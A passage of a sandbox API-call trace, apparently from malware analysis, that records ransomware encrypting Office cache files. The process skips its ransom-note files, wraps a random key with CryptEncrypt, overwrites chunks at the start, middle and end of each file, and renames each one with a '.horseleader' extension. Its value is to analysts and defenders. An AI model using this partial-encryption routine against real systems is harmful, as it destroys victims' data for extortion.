users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.horseleader")) returned 1 [0220.467] GetProcessHeap () returned 0x780000 [0220.467] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0220.467] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2a2397e0, ftCreationTime.dwHighDateTime=0x1cbe19a, ftLastAccessTime.dwLowDateTime=0x2a2397e0, ftLastAccessTime.dwHighDateTime=0x1cbe19a, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0220.467] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0220.471] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0220.471] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".horseleader") returned 0x0 [0220.471] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="#Decrypt#.txt") returned 1 [0220.471] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="_uninstalling_.png") returned 1 [0220.471] lstrlenW (lpString=".testttjffg") returned 11 [0220.471] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpSrch=".testttjffg") returned 0x0 [0220.471] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0220.471] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0220.471] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0220.474] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0220.474] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".txt") returned 0x0 [0220.474] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=715834) returned 1 [0220.474] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.474] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.522] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0220.523] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.523] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x54e1d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.523] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, 
lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.929] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0220.929] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.929] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa9c3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.929] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.940] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0220.940] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.940] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.940] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0220.941] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0220.941] CloseHandle (hObject=0x21c) returned 1 [0220.941] GetProcessHeap () returned 0x780000 [0220.941] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0220.941] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.horseleader") returned 103 [0220.941] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.horseleader")) returned 1 [0220.942] GetProcessHeap () returned 0x780000 [0220.942] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0220.942] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c1614f0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7c1614f0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xa4c400, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PrjProrWW.msi", cAlternateFileName="PRJPRO~1.MSI")) returned 1 [0220.942] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="Windows") returned -1 [0220.942] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 80 [0220.942] StrStrIW (lpFirst="PrjProrWW.msi", lpSrch=".horseleader") returned 0x0 [0220.942] lstrcmpW (lpString1="PrjProrWW.msi", lpString2="#Decrypt#.txt") returned 1 [0220.942] lstrcmpW (lpString1="PrjProrWW.msi", 
lpString2="_uninstalling_.png") returned 1 [0220.942] lstrlenW (lpString=".testttjffg") returned 11 [0220.942] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi", lpSrch=".testttjffg") returned 0x0 [0220.942] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0220.942] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0220.942] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0220.943] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 80 [0220.943] StrStrW (lpFirst="PrjProrWW.msi", lpSrch=".txt") returned 0x0 [0220.943] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=10798080) returned 1 [0220.944] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.944] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.963] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0220.963] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, 
lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.964] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x523a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.964] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.001] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0221.001] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.001] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa47400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.001] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.264] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0221.264] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.264] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.264] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, 
lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0221.264] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0221.264] CloseHandle (hObject=0x21c) returned 1 [0221.265] GetProcessHeap () returned 0x780000 [0221.265] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0221.265] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.horseleader") returned 92 [0221.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.horseleader")) returned 1 [0221.266] GetProcessHeap () returned 0x780000 [0221.266] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0221.266] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cabec50, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7cabec50, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1915, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PrjProrWW.xml", cAlternateFileName="PRJPRO~1.XML")) returned 1 [0221.266] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="Windows") returned -1 [0221.266] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0221.266] StrStrIW (lpFirst="PrjProrWW.xml", lpSrch=".horseleader") returned 0x0 [0221.266] lstrcmpW (lpString1="PrjProrWW.xml", lpString2="#Decrypt#.txt") returned 1 [0221.266] lstrcmpW (lpString1="PrjProrWW.xml", lpString2="_uninstalling_.png") returned 1 [0221.266] lstrlenW (lpString=".testttjffg") returned 11 [0221.266] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpSrch=".testttjffg") returned 0x0 [0221.266] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0221.266] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0221.267] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0221.268] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0221.268] StrStrW (lpFirst="PrjProrWW.xml", lpSrch=".txt") returned 0x0 [0221.268] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=6421) returned 1 [0221.268] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x1915, lpOverlapped=0x0) returned 1 [0221.272] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffe6eb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0221.272] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x1915, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x1915, lpOverlapped=0x0) returned 1 [0221.272] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.273] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0221.273] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0221.273] CloseHandle (hObject=0x21c) returned 1 [0221.273] GetProcessHeap () returned 0x780000 [0221.273] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0221.273] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.horseleader") returned 92 [0221.273] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.horseleader")) returned 1 [0221.277] GetProcessHeap () returned 0x780000 [0221.277] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0221.277] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: 
lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c87b0c0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x6c87b0c0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa6b67930, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x9b6ba9f, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PrjPrrWW.cab", cAlternateFileName="")) returned 1 [0221.277] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="Windows") returned -1 [0221.277] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 79 [0221.277] StrStrIW (lpFirst="PrjPrrWW.cab", lpSrch=".horseleader") returned 0x0 [0221.277] lstrcmpW (lpString1="PrjPrrWW.cab", lpString2="#Decrypt#.txt") returned 1 [0221.277] lstrcmpW (lpString1="PrjPrrWW.cab", lpString2="_uninstalling_.png") returned 1 [0221.277] lstrlenW (lpString=".testttjffg") returned 11 [0221.277] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab", lpSrch=".testttjffg") returned 0x0 [0221.277] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0221.277] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0221.278] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0221.278] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 79 [0221.278] StrStrW (lpFirst="PrjPrrWW.cab", lpSrch=".txt") returned 0x0 [0221.278] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=162970271) returned 1 [0221.278] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.278] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.286] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0221.286] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.286] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4db354f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.287] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.310] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0221.310] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.311] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x9b66a9f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 
[0221.311] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.367] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0221.367] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.367] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.367] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0221.367] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0221.367] CloseHandle (hObject=0x21c) returned 1 [0221.368] GetProcessHeap () returned 0x780000 [0221.368] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0221.368] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.horseleader") returned 91 [0221.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.horseleader" (normalized: 
